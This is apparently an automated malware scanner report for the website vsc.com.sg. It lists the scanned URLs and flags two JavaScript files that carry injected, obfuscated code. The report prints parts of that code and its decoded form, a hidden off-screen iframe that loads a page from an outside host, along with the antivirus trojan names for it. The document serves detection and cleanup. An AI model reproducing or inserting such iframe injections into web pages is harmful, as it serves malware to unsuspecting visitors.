New scan:

Malware Scanner report for vsc.com.sg

Malicious/Suspicious/Total urls checked
1/1/17
2 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://vsc.com.sg/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:57 GMT
Location: http://vsc.com.sg/main
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
clean
http://vsc.com.sg/main
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:59 GMT
Location: http://vsc.com.sg/main/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
clean
http://vsc.com.sg/main/
200 OK
Content-Length: 62438
Content-Type: text/html
clean
http://vsc.com.sg/main/media/system/js/mootools-core.js
200 OK
Content-Length: 96362
Content-Type: application/javascript
clean
http://vsc.com.sg/main/media/system/js/core.js
200 OK
Content-Length: 4784
Content-Type: application/javascript
clean
http://vsc.com.sg/main/media/system/js/caption.js
200 OK
Content-Length: 2594
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ffff_listier_ua(){
var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeB
...[2152 bytes skipped]...

Decoded script:


<iframe src="http://tratramelly.nflix.co/gsatersyutriujf8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe>

http://vsc.com.sg/main/media/system/js/mootools-more.js
200 OK
Content-Length: 238331
Content-Type: application/javascript
clean
http://vsc.com.sg/main/plugins/system/rokbox/assets/js/rokbox.js
200 OK
Content-Length: 55369
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-totop.js
200 OK
Content-Length: 378
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-smartload.js
200 OK
Content-Length: 2815
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-buildspans.js
200 OK
Content-Length: 698
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-inputs.js
200 OK
Content-Length: 3880
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/browser-engines.js
200 OK
Content-Length: 2662
Content-Type: application/javascript
clean
http://vsc.com.sg/main/templates/rt_clarion/js/load-transition.js
200 OK
Content-Length: 2571
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ffff_listier_ua(){
var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire
... 1488 bytes are skipped ...
body = document.id('rt-transition');
if (Browser.Engine.gecko19 || (Browser.Engine.trident && !Browser.Engine.trident7)){
if (body){
body.set('tween', {duration: 800, transition: 'quad:out'});
body.setStyles({'visibility': 'hidden', 'opacity': 0});
body.removeClass('rt-hidden').fade('in');
}

return;
}

if (body) body.removeClass('rt-hidden').addClass('rt-visible');
};
window.addEvent('load', animation);
})());

Decoded script:


<iframe src="http://tratramelly.nflix.co/gsatersyutriujf8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/IFrame.XX!tr

http://vsc.com.sg/main/modules/mod_roknavmenu/themes/fusion/js/fusion.js
200 OK
Content-Length: 26565
Content-Type: application/javascript
clean
http://vsc.com.sg//ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js/
404 Not Found
Content-Length: 326
Content-Type: text/html
clean
http://vsc.com.sg/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vsc.com.sg

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:57 GMT
Location: http://vsc.com.sg/main
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vsc.com.sg
Referer: http://www.google.com/search?q=vsc.com.sg

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vsc.com.sg

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vsc.com.sg/

Result: vsc.com.sg is not infected or malware details are not published yet.